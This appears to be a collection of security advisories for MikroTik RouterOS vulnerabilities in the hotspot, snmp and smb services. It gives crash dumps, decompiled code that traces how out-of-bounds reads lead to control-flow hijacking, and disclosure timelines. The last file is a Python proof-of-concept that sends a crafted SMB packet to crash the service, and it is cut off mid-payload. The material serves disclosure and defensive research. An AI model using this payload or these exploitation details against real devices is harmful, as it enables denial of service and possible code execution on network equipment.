2020.06.22-15:04:20.55@0: 49 | 2020.06.22-15:04:20.55@0: eip=0x65737520 eflags=0x00010202 50 | 2020.06.22-15:04:20.55@0: edi=0xffffffff esi=0xffffffec ebp=0x7fad0fd8 esp=0x7fad0f5c 51 | 2020.06.22-15:04:20.55@0: eax=0x7fad0fb4 ebx=0x6d7ae08a ecx=0x00000000 edx=0x65737520 52 | 2020.06.22-15:04:20.55@0: 53 | 2020.06.22-15:04:20.55@0: maps: 54 | 2020.06.22-15:04:20.55@0: 08048000-08078000 r-xp 00000000 00:12 34 /ram/pckg/hotspot/nova/bin/hotspot 55 | 2020.06.22-15:04:20.55@0: 7770d000-77742000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 56 | 2020.06.22-15:04:20.55@0: 77746000-77760000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 57 | 2020.06.22-15:04:20.55@0: 77761000-77770000 r-xp 00000000 00:0c 944 /lib/libuc++.so 58 | 2020.06.22-15:04:20.55@0: 77771000-7778e000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 59 | 2020.06.22-15:04:20.55@0: 7778f000-77795000 r-xp 00000000 00:0c 951 /lib/liburadius.so 60 | 2020.06.22-15:04:20.55@0: 77796000-777e2000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.22-15:04:20.55@0: 777e5000-777ed000 r-xp 00000000 00:0c 950 /lib/libubox.so 62 | 2020.06.22-15:04:20.55@0: 777f1000-777f8000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 63 | 2020.06.22-15:04:20.55@0: 64 | 2020.06.22-15:04:20.55@0: stack: 0x7fad2000 - 0x7fad0f5c 65 | 2020.06.22-15:04:20.55@0: 91 f9 05 08 8a e0 7a 6d 9c 0f ad 7f b4 0f ad 7f 00 00 00 00 9c 0f ad 7f 01 00 00 00 03 00 00 00 66 | 2020.06.22-15:04:20.55@0: 00 4f 74 77 9c 0f ad 7f ff ff ff ff 1c e0 07 08 18 e0 07 08 b0 fb 07 08 00 00 00 00 c8 0f ad 7f 67 | 2020.06.22-15:04:20.55@0: 68 | 2020.06.22-15:04:20.55@0: code: 0x65737520 69 | ``` 70 | 71 | #### Details 72 | 73 | It can be triggered by sending a nova message to the default handler. In its vtable, the default `nv::Handler::cmdUnknown()` is overwritten by `sub_805F834()`. 74 | 75 | In `sub_805F834()`, if `a5` equals to `0xfe0008`, the routine will go to `(2)`, where the value of u32_id `0xfe000e` will be read and assigned to `v51`. Then in the for loop at `(3)`, `v51` is assigned to variable `i`, and a signed comparison is used in the condition statement. Later at `(4)`, variable `i` is used as an index to read from address `0x80779E0`. The value will be assigned to `v12` at `(5)`. Then at `(6)`, `v12` will be regarded as a function pointer. 76 | The key point is the signed comparison at `(3)`. If we provide a negative value like `-1`, then we can cause out-of-bounds read at `(4)`, and furtherly affect the function pointer at `(6)`. By sending a crafted nova message, it's possible to achieve code execution. 77 | 78 | ```c++ 79 | // file: /ram/pckg/hotspot/nova/bin/hotspot in stable 6.46.5 80 | nv::Handler sub_805F834(int a1, nv::Handler *a2, nv::message *a3, unsigned int a4, int a5) 81 | { 82 | if ( a5 != 0xFE0008 ) // (1) command id 83 | { 84 | /* ... case for other command ids ... */ 85 | } 86 | v55 = (nv::message **)dword_8078804; 87 | v5 = nv::message::get(a4, 0xFE000F, a1, a1); 88 | nv::message::message(v58, v5); 89 | v51 = nv::message::get(a4, 0xFE000E); // (2) 90 | /* ... */ 91 | if ( v51 ) 92 | { 93 | /* ... */ 94 | for ( i = v51; i <= 11; ++i ) // (3) signed comparison 95 | { 96 | if ( dword_80779E0[5 * i] ) 97 | { 98 | string::string((string *)v64); 99 | v11 = dword_80779E0[5 * i]; // (4) out-of-bounds read 100 | v12 = (int (__cdecl *)(char *, char *, char *, bool))v11; // (5) 101 | v13 = dword_80779E4[5 * i]; 102 | if ( (v11 & 1) != 0 ) 103 | v12 = *(int (__cdecl **)(char *, char *, char *, bool))(*(char **)((char *)v55 + v13) + v11 - 1); 104 | v14 = v12((char *)v55 + v13, v58, v64, i != v51); // (6) control flow hijacking 105 | /* ... */ 106 | ``` 107 | 108 | #### Affected Version 109 | 110 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `7.5`. 111 | 112 | #### Timeline 113 | 114 | + 2022/07/29 - reported the vulnerability to the vendor 115 | + 2022/08/16 - vendor confirmed the vulnerability and would fix it in future releases 116 | + 2022/08/26 - vendor confirmed that the vulnerability was fixed 117 | + 2022/08/31 - stable 7.5 was released and this vulnerability was fixed 118 | + 2022/12/06 - CVE was assigned 119 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2022-45315/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2022-45315 2 | 3 | #### Description 4 | 5 | The `snmp` process suffers from an out-of-bounds read vulnerability. Due to lack of proper validation on value of a specific u32_id key, by sending a crafted packet, it's possible to cause out-of-bounds read, which may affect the function pointer of an indirect call later. It's possible for an authenticated user to achieve code execution. 6 | 7 | > The authentication here means that the user should be authenticated to the device itself (e.g. web, winbox). 8 | 9 | Against stable `6.47`, the poc resulted in the following crash dump. 10 | 11 | ```shell 12 | ---- current v6.47 Jun/02/2020 07:38:00 ---- 13 | 2022.10.12-16:41:40.81@0: 14 | 2022.10.12-16:41:40.81@0: /nova/bin/snmp 15 | 2022.10.12-16:41:40.81@0: --- signal=11 -------------------------------------------- 16 | 2022.10.12-16:41:40.81@0: 17 | // ... register details are missing in the generated autosupout.rif 18 | 2022.10.12-16:41:40.81@0: 19 | 2022.10.12-16:41:40.81@0: 776ad000-776b3000 r-xp 00000000 00:19 92 /ram/pckg/wireless/nova/lib/snmp/wireless.so 20 | 2022.10.12-16:41:40.81@0: 776b4000-776b7000 r-xp 00000000 00:12 16 /ram/pckg/ups/nova/lib/snmp/ups.so 21 | 2022.10.12-16:41:40.81@0: 776b8000-776ba000 r-xp 00000000 00:13 95 /ram/pckg/ppp/nova/lib/snmp/aaasession.so 22 | ... 23 | 2022.10.12-16:41:40.81@0: 776c4000-776c7000 r-xp 00000000 00:11 83 /ram/pckg/ipv6/nova/lib/snmp/ipv6.so 24 | 2022.10.12-16:41:40.81@0: 776c9000-776fe000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 25 | 2022.10.12-16:41:40.81@0: 77702000-7771c000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 26 | 2022.10.12-16:41:40.81@0: 7771d000-7772c000 r-xp 00000000 00:0c 945 /lib/libuc++.so 27 | 2022.10.12-16:41:40.81@0: 7772d000-7774a000 r-xp 00000000 00:0c 948 /lib/libucrypto.so 28 | 2022.10.12-16:41:40.81@0: 7774b000-7774d000 r-xp 00000000 00:0c 961 /lib/libdl-0.9.33.2.so 29 | 2022.10.12-16:41:40.81@0: 7774f000-77757000 r-xp 00000000 00:0c 951 /lib/libubox.so 30 | 2022.10.12-16:41:40.81@0: 77758000-777a4000 r-xp 00000000 00:0c 947 /lib/libumsg.so 31 | 2022.10.12-16:41:40.81@0: 777aa000-777b1000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 32 | 2022.10.12-16:41:40.81@0: 33 | 2022.10.12-16:41:40.81@0: backtrace: 0x00000001 0x77725a21 0x08071054 0x0806e019 0x7775396a 0x7777fff9 0x7777caca 0x7777f092 0x7777ee4e 0x7777a85b 0x7777a2a5 0x7777a3bf 0x7778103f 0x08056bb5 0x776f7fcb 0x08056c0d 34 | ``` 35 | 36 | #### Details 37 | 38 | According to the backtrace information, in `Item::setConfig()`, at `(1)`, it will read value of u32_id `20`, and save it to the memory pointed by `this + 6`. Then in normal cases, the routine will reach `(2)`, where `Item::regenerateKeys()` is called. 39 | 40 | ```c++ 41 | // file: /nova/bin/snmp in stable 6.47 42 | int Item::setConfig(Item *this, const nv::message *a2) 43 | { 44 | /* ... */ 45 | *((_DWORD *)this + 6) = nv::message::get(a2, 20, *((_DWORD *)this + 6)); // (1) 46 | *((_DWORD *)this + 7) = nv::message::get(a2, 21, *((_DWORD *)this + 7)); 47 | /* ... */ 48 | if ( loop ) 49 | Item::regenerateKeys(this, (SnmpLooper *)((char *)loop + 1460)); // (2) 50 | /* ... */ 51 | ``` 52 | 53 | In `Item::regenerateKeys()`, the previous saved value will be assigned to `v2` at `(3)`. At `(4)`, `v2` is used as an offset to calculate address, and the result is assigned to `v3`. Then it will perform multiple lookups, in some cases, the routine will reach `(6)`, where `tree_base::insert_unique()` is called, and `v3` is passed as the second argument. It should be noted that the `v3` is controllable. 54 | 55 | ```c++ 56 | int Item::regenerateKeys(Item *this, const string *a2) 57 | { 58 |   v2 = *((_DWORD *)this + 6); // (3) 59 |   v3 = 28 * v2 + 0x8074B84; // (4) out-of-bounds read 60 |   v4 = 28 * v2 + 0x8074B88; 61 |   v5 = *((_DWORD *)&unk_8074B88 + 7 * v2) & 0xFFFFFFFC; // (5) 62 |   v6 = v4; 63 |   /* ... search in tree related to v5 and change v6 ... */ 64 |   if ( v6 == v4 ) 65 |   { 66 |     v9 = *(_DWORD *)(v3 + 4) & 0xFFFFFFFC; 67 |     v10 = v6; 68 |     /* ... search in tree related to v9 and change v10 ...*/ 69 |     if ( v10 == v6 ) 70 |     { 71 |       /* ... */ 72 |       tree_base::insert_unique((int)&v18, v3, v10, (int)&v23, 73 | (int)map_node_constr>); // (6) 74 |       /* ...*/ 75 | } 76 | ``` 77 | 78 | In `tree_base::insert_unique()`, there are many calls to `sub_938c()`, where `a2` is passed as the first argument. 79 | 80 | ```c++ 81 | _DWORD * tree_base::insert_unique(_DWORD *a1, _DWORD *a2, int a3, int a4, void (__cdecl *a5)(int)) 82 | { 83 |   if ( a3 == a2[2] ) 84 |   { 85 |     if ( !*a2 || !sub_938C((int)a2, a4, a2[5] + a3) ) 86 |       goto LABEL_12; 87 |     goto LABEL_10; 88 |   } 89 |   if ( (_DWORD *)a3 != a2 + 1 ) 90 |   { 91 |     v7[0] = a3; 92 |     tree_iterator_base::decr((tree_iterator_base *)v7); 93 |     if ( !sub_938C((int)a2, a2[5] + v7[0], a4) || !sub_938C((int)a2, a4, a2[5] + a3) ) 94 |       goto LABEL_12; 95 | LABEL_10: 96 |     a5(a4); 97 |     goto LABEL_11; 98 |   } 99 |   if ( !sub_938C((int)a2, a2[5] + a2[3], a4) ) //(7) 100 |   { 101 |     /* ... */ 102 | } 103 | ``` 104 | 105 | 106 | In `sub_938C()`, as can be seen, it will dereference the value at `(a1+16)`, and invoke a function call. Since `a1` is controllable, by sending a crafted nova message, we can hijack the control flow. 107 | 108 | ```c++ 109 | int sub_938C(int a1, int a2, int a3) 110 | { 111 |   return (*(int (__stdcall **)(_DWORD, int, int))(a1 + 16))( 112 | *(_DWORD *)(a1 + 24), a2, a3); //(8) control flow hijacking 113 | } 114 | ``` 115 | 116 | #### Affected Version 117 | 118 | This vulnerability was initially found in long-term `6.44.6`. And the stable `7.6` seems to still suffer from this vulnerability. 119 | 120 | > The vendor responded that it was fixed in `7.6` version. 121 | 122 | #### Timeline 123 | 124 | + 2022/07/29 - reported the vulnerability to the vendor 125 | + 2022/08/16 - vendor confirmed the vulnerability 126 | + 2022/10/31 - vendor responded that it was fixed in `7.6` version 127 | + 2022/12/05 - CVE was assigned 128 | 129 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_hotspot_2/README.md: -------------------------------------------------------------------------------- 1 | ### vul_hotspot_2 2 | 3 | #### Description 4 | 5 | The `hotspot` process suffers from an assertion failure vulnerability. There is a reachable assertion in the `hotspot` process. By sending a crafted packet, an authenticated remote user can crash the `hotspot` process due to assertion failure. 6 | 7 | > The authentication here means that the user should be authenticated to the device itself (e.g. web, winbox). 8 | 9 | Against stable `6.46.5`, the poc resulted in the following crash dump. 10 | 11 | ```shell 12 | ---- current v6.46.5 Apr/07/2020 08:28:27 ---- 13 | 2022.10.31-15:15:36.78@0: 14 | 2022.10.31-15:15:36.78@0: 15 | 2022.10.31-15:15:36.78@0: /ram/pckg/hotspot/nova/bin/hotspot 16 | 2022.10.31-15:15:36.78@0: --- signal=6 -------------------------------------------- 17 | 2022.10.31-15:15:36.78@0: 18 | 2022.10.31-15:15:36.78@0: eip=0x7767e55b eflags=0x00000246 19 | 2022.10.31-15:15:36.78@0: edi=0x00000fe1 esi=0x77686200 ebp=0x7fdf7120 esp=0x7fdf7118 20 | 2022.10.31-15:15:36.78@0: eax=0x00000000 ebx=0x000000b8 ecx=0x000000b8 edx=0x00000006 21 | 2022.10.31-15:15:36.78@0: 22 | 2022.10.31-15:15:36.78@0: maps: 23 | 2022.10.31-15:15:36.78@0: 08048000-08078000 r-xp 00000000 00:12 34 /ram/pckg/hotspot/nova/bin/hotspot 24 | 2022.10.31-15:15:36.78@0: 77650000-77685000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 25 | 2022.10.31-15:15:36.78@0: 77689000-776a3000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 26 | 2022.10.31-15:15:36.78@0: 776a4000-776b3000 r-xp 00000000 00:0c 944 /lib/libuc++.so 27 | 2022.10.31-15:15:36.78@0: 776b4000-776d1000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 28 | 2022.10.31-15:15:36.78@0: 776d2000-776d8000 r-xp 00000000 00:0c 951 /lib/liburadius.so 29 | 2022.10.31-15:15:36.78@0: 776d9000-77725000 r-xp 00000000 00:0c 946 /lib/libumsg.so 30 | 2022.10.31-15:15:36.78@0: 77728000-77730000 r-xp 00000000 00:0c 950 /lib/libubox.so 31 | 2022.10.31-15:15:36.78@0: 77734000-7773b000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 32 | 2022.10.31-15:15:36.78@0: 33 | 2022.10.31-15:15:36.78@0: stack: 0x7fdf8000 - 0x7fdf7118 34 | 2022.10.31-15:15:36.78@0: 00 60 68 77 00 60 68 77 58 71 df 7f 77 a0 67 77 06 00 00 00 00 62 68 77 20 00 00 00 00 00 00 00 35 | 2022.10.31-15:15:36.78@0: 15 00 00 00 b8 71 df 7f 54 71 df 7f e4 5a 72 77 01 00 00 00 e4 5a 72 77 15 00 00 00 e1 0f 00 00 36 | 2022.10.31-15:15:36.78@0: 37 | 2022.10.31-15:15:36.78@0: code: 0x7767e55b 38 | 2022.10.31-15:15:36.78@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 39 | 2022.10.31-15:15:36.78@0: 40 | 2022.10.31-15:15:36.78@0: backtrace: 0x7767e55b 0x7767a077 0x77704ad3 0x7772c9a5 0x77700fb5 0x776fda8a 0x7770004e 0x776ffe82 0x776fb81b 0x776fb265 0x776fb37f 0x77701ffb 0x0804f7ed 0x7767efcb 0x08050b01 41 | ``` 42 | 43 | #### Affected Version 44 | 45 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `7.5`. 46 | 47 | #### Timeline 48 | 49 | + 2022/07/29 - reported the vulnerability to the vendor 50 | + 2022/08/16 - vendor confirmed the vulnerability and would fix it in future releases 51 | + 2022/08/26 - vendor confirmed that the vulnerability was fixed 52 | + 2022/08/31 - stable 7.5 was released and this vulnerability was fixed 53 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_1/README.md: -------------------------------------------------------------------------------- 1 | ### vul_smb_1 2 | 3 | #### Description 4 | 5 | The `smb` process suffers from a memory corruption vulnerability. By sending a crafted packet, an unauthenticated remote user can crash the `smb` process due to invalid memory access. 6 | 7 | > In default, the `smb` service is disabled. 8 | 9 | #### Reproduce 10 | 11 | ```shell 12 | $ python poc.py 13 | ``` 14 | #### Affected Version 15 | 16 | This vulnerability was found in stable `6.44.2`, and was fixed since stable `6.44.3`. 17 | 18 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_1/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import socket 4 | 5 | 6 | def vul_smb_1(host, port=445): 7 | payload = '\x00\x00\x00\xee\xfeSMB\x0e\xf3\xa0\x80\xb6\xfe\xa0\x80\xbd\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff?\xe1\x9a\x80\x00\x01\x0e\xe2\x7f\x87\xf3\xa0\x81\xb7\xfe\x1b\x00\x00\x00\x00\xb7\xfe\x1b\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\xa0\x81\xb5\x00\x00\x00\x00\x00\x00\x00\x00$\xc0\x80\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xd1\xc5\x81\xc2\xec\x88\xf3\xa0\xa0\x80\xb1\xea\x11\x8